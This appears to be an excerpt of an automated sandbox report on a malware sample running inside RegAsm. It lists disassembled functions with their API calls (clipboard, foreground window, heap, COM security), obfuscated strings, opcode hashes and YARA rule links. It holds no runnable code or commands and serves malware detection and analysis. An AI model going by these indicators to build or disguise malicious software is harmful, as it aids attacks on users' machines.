                                                                          • Instruction Fuzzy Hash: EFB146717493414BC318DB2AC8D1A3BBBE6ABE9314F1CD93DE58687392C638DC058796
                                                                          Function 0043B480 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                          Function 00417E82 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: tuv
                                                                          • API String ID: 0-2475268160
                                                                          • Opcode ID: 692413315616f7dcebff6ff457f6b3838c60e2c9e7b6f7554dd79316d44026a4
                                                                          • Instruction ID: 96cc1be5c7b42f4822ccf6fdabcc1d0a1cf8542e79077bfe6f2257edbdd6f4ef
                                                                          • Opcode Fuzzy Hash: 692413315616f7dcebff6ff457f6b3838c60e2c9e7b6f7554dd79316d44026a4
                                                                          • Instruction Fuzzy Hash: 2B6133B6604700CFC7208F24D8923A3B3F2FF96318F18456EE996477A1E739A945C759
                                                                          Function 0043DBD0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: @
                                                                          • API String ID: 2994545307-2766056989
                                                                          • Opcode ID: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                          • Instruction ID: 1421818bc4f15c0d032df179158ed2797c8d4970c2420d5e39c05150b2e3af5d
                                                                          • Opcode Fuzzy Hash: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                          • Instruction Fuzzy Hash: C33100B15183048BC314DF18E8C162BBBF8FB9A314F15A92DE68687391D3759908CB9A
                                                                          Function 00409CC0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \U^_
                                                                          • API String ID: 0-352632802
                                                                          • Opcode ID: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                          • Instruction ID: 5fa690bb4235e6f9a1b833386d74a381627e7adb8b1be8a89cbf23ee07b36487
                                                                          • Opcode Fuzzy Hash: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                          • Instruction Fuzzy Hash: D011E23060C3808FD324DF3495549ABBBA5EFD7748F545A2CE4C56B281C735980A8FAA
                                                                          Function 0043DCF0 Relevance: .3, Instructions: 272COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                                                          • Instruction ID: 42590aa1c4a3029240d7faad05c1566b36b776a36cf424c854185cc8c2ee326e
                                                                          • Opcode Fuzzy Hash: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                                                          • Instruction Fuzzy Hash: 58717A31A043014BC714AF29E890A3FB7A6EFDD750F1AD43EE4868B365DB349C11878A
                                                                          Function 0043B720 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32 ref: 0043B720
                                                                          • GetForegroundWindow.USER32 ref: 0043B740
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: ForegroundWindow
                                                                          • String ID:
                                                                          • API String ID: 2020703349-0
                                                                          • Opcode ID: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
                                                                          • Instruction ID: 191facca889f69fa70601903ca8693053aaba1cbaba24685dbffd0b384c421fe
                                                                          • Opcode Fuzzy Hash: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
                                                                          • Instruction Fuzzy Hash: 7ED0A7FDD20110EBC604AB71FC4A41B3A1AEB4722DB545539EC0343352DA39782E868F
                                                                          Function 0043B420 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B29B,?,00000001,?,?,?,?,?,?,?), ref: 0043B452
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
                                                                          • Instruction ID: a89ac6462aaa6a8a5f29c09ee71e481237a955995f4f3f89a98fbf9f2f2a6ed3
                                                                          • Opcode Fuzzy Hash: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
                                                                          • Instruction Fuzzy Hash: FBE0E536904210EBD2002B357C06B177678EF9B715F060436F40152115D739E801C5DE
                                                                          Function 00430879 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: BlanketProxy
                                                                          • String ID:
                                                                          • API String ID: 3890896728-0
                                                                          • Opcode ID: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
                                                                          • Instruction ID: 1146a04256a80fd680d05c5d227ab35205256b262c73fed29a8c8dc337ffb545
                                                                          • Opcode Fuzzy Hash: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
                                                                          • Instruction Fuzzy Hash: E00114B5249702CFE310CF64D5D8B4BBBF1AB84304F14892CE8A54B385C7B9A9498FC2
                                                                          Function 0042E343 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: BlanketProxy
                                                                          • String ID:
                                                                          • API String ID: 3890896728-0
                                                                          • Opcode ID: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
                                                                          • Instruction ID: cdfd11b330a352dee93e16416f8877f043d61a2de36bf40ddff772d5b84e5129
                                                                          • Opcode Fuzzy Hash: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
                                                                          • Instruction Fuzzy Hash: C601F9B86097058FE305DF28D498B5ABBF1FB89304F10881CE4958B3A1C779A949CF81
                                                                          Function 0040CDF0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CE03
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize
                                                                          • String ID:
                                                                          • API String ID: 2538663250-0
                                                                          • Opcode ID: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                                                          • Instruction ID: f1973b7854016afe0481596635c710bb103935c4c1c993b3491e04eff0e8badb
                                                                          • Opcode Fuzzy Hash: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                                                          • Instruction Fuzzy Hash: 01D0A7345545486BD250A75CDD0BF563A5C9703B29F400239B763D61D1D9506920C669
                                                                          Function 0040CE23 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CE35
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeSecurity
                                                                          • String ID:
                                                                          • API String ID: 640775948-0
                                                                          • Opcode ID: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
                                                                          • Instruction ID: 9bb2948b1e33ad1240181575e0f5375bfb099cf60bc3df2fdc322b3d55e14239
                                                                          • Opcode Fuzzy Hash: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
                                                                          • Instruction Fuzzy Hash: CAD0C9343D83007AF5748B48ED53F1432169702F11FB00629F322FE6D4C9E07121861D
                                                                          Function 00439B60 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(?,00000000,00000000,00412F5C), ref: 00439B80
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
                                                                          • Instruction ID: 8d81dc3d2e1c71e2762f942217139477682170591cb2c618f1865e02491f5b7e
                                                                          • Opcode Fuzzy Hash: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
                                                                          • Instruction Fuzzy Hash: 76D0C935505126EBCA506B28BC15BC73A989F4A671F0708A1B4006A075C765EC919AD8
                                                                          Function 00439B40 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,?,00414E57,00000400), ref: 00439B50
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                          • Instruction ID: 3d340f236624c1ae318c051adf9ea47d82c8c11c3707c94fc3fa8f772c7fe72e
                                                                          • Opcode Fuzzy Hash: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                          • Instruction Fuzzy Hash: 91C04831145224ABDA10AB15EC09B8A3AA8AF496A1F1A04A6B005660B28760AC929A98

                                                                          Non-executed Functions

                                                                          Function 00419C10 Relevance: 15.3, APIs: 2, Strings: 6, Instructions: 1297COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0043B480: LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                                                          • FreeLibrary.KERNEL32(?), ref: 0041A21A
                                                                          • FreeLibrary.KERNEL32(?), ref: 0041A29B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary$InitializeThunk
                                                                          • String ID: I,~M$PQ$cba`$cba`$cba`$wEtG
                                                                          • API String ID: 764372645-3803835663
                                                                          • Opcode ID: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                                                          • Instruction ID: ce701afe96e54189f6fff091c8333c98f5ae15aa60c98f01a083bef101dadeb2
                                                                          • Opcode Fuzzy Hash: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                                                          • Instruction Fuzzy Hash: C59235746093409FE714CF65D891B6BBBE2EBD5300F28882EE58487391D7799C81CB9B
                                                                          Function 00425920 Relevance: 12.9, Strings: 10, Instructions: 398COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: z%|$"r,t$&f?x$3v#H$<b"d$=j9l$cba`$cba`$Z\$^P
                                                                          • API String ID: 0-3047316687
                                                                          • Opcode ID: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                                                          • Instruction ID: 146473404e5499b4986dffa8d26f26e1c07bf5215faae6f3d7194190b628d0b4
                                                                          • Opcode Fuzzy Hash: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                                                          • Instruction Fuzzy Hash: C2D124B9608380DFE324DF15E88176BB7E1FBD5304F94982DE58587261D738D901CB4A
                                                                          Function 00431A30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109clipboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                          • String ID: K
                                                                          • API String ID: 2832541153-856455061
                                                                          • Opcode ID: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                                                          • Instruction ID: 513562b2ac7e6d1d4712994eff6d7c1bc04b9d90a7c3137532ed1f51a9abc6ba
                                                                          • Opcode Fuzzy Hash: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                                                          • Instruction Fuzzy Hash: 34418E6150C7818ED310AF7C988826FBFE09B96224F044A6EE8E5872D2E6389549C797
                                                                          Function 004296D8 Relevance: 9.1, Strings: 7, Instructions: 340COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: );?g$9nI9$;>*2$='0{$[93=$cba`$fa
                                                                          • API String ID: 0-154584671
                                                                          • Opcode ID: 3e51a02978bc99ce7d016768a4801fe2a924607298026115374562d3702a8947
                                                                          • Instruction ID: 21be1e4f2e6752f9380b4aadbcf4cd787e7e0f4b09ea5b297d7e9ef9a1fb0c4b
                                                                          • Opcode Fuzzy Hash: 3e51a02978bc99ce7d016768a4801fe2a924607298026115374562d3702a8947
                                                                          • Instruction Fuzzy Hash: 3FC1077560C3A08FC3118F29D89066BBBE2AF96310F588A6DF4E1573D2C7398D45CB5A
                                                                          Function 0042D085 Relevance: 6.6, Strings: 5, Instructions: 368COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #$0$AGsW$P$k
                                                                          • API String ID: 0-1629916805
                                                                          • Opcode ID: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                                                          • Instruction ID: 8816b6b3b95a3b8c405e0a0f8c285763547ceed8af8c8b555c70c7a9f783aa76
                                                                          • Opcode Fuzzy Hash: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                                                          • Instruction Fuzzy Hash: 1CC1F4317183918ED328CF39D4513ABBBD2AFD2304F68866ED4D58B2D1D6798449C71B
                                                                          Function 0042B763 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 308COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID: 3$qjjw
                                                                          • API String ID: 3664257935-3235754969
                                                                          • Opcode ID: 3641d3b1d95d9d0e2252580d4e70a4747529bd2a480d62c0a42bd322f018f1c7
                                                                          • Instruction ID: e0248e225440bb7285b8803733d60271f7e61eb44642cbaa2f092a8799675a72
                                                                          • Opcode Fuzzy Hash: 3641d3b1d95d9d0e2252580d4e70a4747529bd2a480d62c0a42bd322f018f1c7
                                                                          • Instruction Fuzzy Hash: 29A16C717083919BE7248F24C8917ABBBD2EFD2340F18856ED5C94B3C6DB384405D796
                                                                          Function 00415ADC Relevance: 5.4, Strings: 4, Instructions: 398COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1/3T$WL$^Q$neA
                                                                          • API String ID: 0-3205570823
                                                                          • Opcode ID: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                          • Instruction ID: 36620dcd79f832a97b090e2ed89ea61b800e286945c25bf48684ec17d430fe28
                                                                          • Opcode Fuzzy Hash: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                          • Instruction Fuzzy Hash: A9D1CEB4100B01CFD7258F25C8A1BA3BBB1FF86314F19858DC8964F7A2D779A855CB94
                                                                          Function 00420717 Relevance: 3.4, Strings: 2, Instructions: 854COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: B:@<$F>?0
                                                                          • API String ID: 0-4011826714
                                                                          • Opcode ID: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                                                          • Instruction ID: 92ed06d7aa227fc4673e4b6d33fedd1ff2714f2f2b1d0eb8acbab6dee258af69
                                                                          • Opcode Fuzzy Hash: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                                                          • Instruction Fuzzy Hash: E43256B1A00721CBCB24CF24C892267BBB1FF92310F59825DD8825F796E779A851CBD5
                                                                          Function 00414F08 Relevance: 3.1, Strings: 2, Instructions: 609COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: =UA$cba`
                                                                          • API String ID: 0-2849403845
                                                                          • Opcode ID: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                                                          • Instruction ID: b0755fcd4efdf1967727a5f4be91126eb1e252dcdfc562f5600afc0ab194aa5f
                                                                          • Opcode Fuzzy Hash: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                                                          • Instruction Fuzzy Hash: 9402FE34608300EFD7149F24D962BABB7B1FB9A304F94582DF481972A2D775EC45CB8A
                                                                          Function 00422270 Relevance: 3.0, Strings: 2, Instructions: 501COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TU$c!"
                                                                          • API String ID: 0-3813282519
                                                                          • Opcode ID: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                                                          • Instruction ID: a4d5b8c078bf2433dc24120fb7555f1f32600d90c3be649242fb2c546733d6d2
                                                                          • Opcode Fuzzy Hash: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                                                          • Instruction Fuzzy Hash: 27C16672B04310ABD714DB29ED5277BB3E2EFD5314F48852EE88587381E6BCE801875A
                                                                          Function 0041D074 Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: pr$|~
                                                                          • API String ID: 0-4145297803
                                                                          • Opcode ID: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                          • Instruction ID: 1c71e515e24bd4364ede3925d09e369eeeaf8989eca5e2d791649c7508655d54
                                                                          • Opcode Fuzzy Hash: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                          • Instruction Fuzzy Hash: E451F0B0A0C3509BD7008F24D8127ABB7F1EF92319F1885AEE4C55B391E7399642CB5E
                                                                          Function 0041D087 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: pr$|~
                                                                          • API String ID: 0-4145297803
                                                                          • Opcode ID: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                          • Instruction ID: b30244ed6a2ff3de417c81c30de102dda9fa652a451c4e072b4a3ececf8c80cf
                                                                          • Opcode Fuzzy Hash: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                          • Instruction Fuzzy Hash: B751F4B460C3509BD7009F24C8126ABB7F1EF92315F1885ADE4C55B391E739D642CB5E
                                                                          Function 0042536C Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BLJB$X
                                                                          • API String ID: 0-2222927247
                                                                          • Opcode ID: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                          • Instruction ID: 1af2eb929763e148cb4abff1c4585c52a2657f08fe5d59f4d12d45bf37d2de30
                                                                          • Opcode Fuzzy Hash: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                          • Instruction Fuzzy Hash: 13515531708B618BD730DE6894412FBBBE1DF55350F984A3ED8D987382E23CA545E74A
                                                                          Function 00427653 Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: H.s $ij
                                                                          • API String ID: 0-4017226643
                                                                          • Opcode ID: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                                                          • Instruction ID: ae217f9daa6f4cce8b7d259f4259de876ba9e86de0ba8af5ed87a71d833a3b47
                                                                          • Opcode Fuzzy Hash: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                                                          • Instruction Fuzzy Hash: 0F31DEB260D3908FD314CF65D48165FBBE2EBC6704F55892DE4C56B340CBB49906CB46
                                                                          Function 00415EE0 Relevance: 1.9, Strings: 1, Instructions: 625COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: 1/3T
                                                                          • API String ID: 2994545307-3266294232
                                                                          • Opcode ID: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                                                          • Instruction ID: ff65059a960126ae2aa6a0ba82ae0d71c7a8e5e6bd522a8814a62b27b48fd42c
                                                                          • Opcode Fuzzy Hash: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
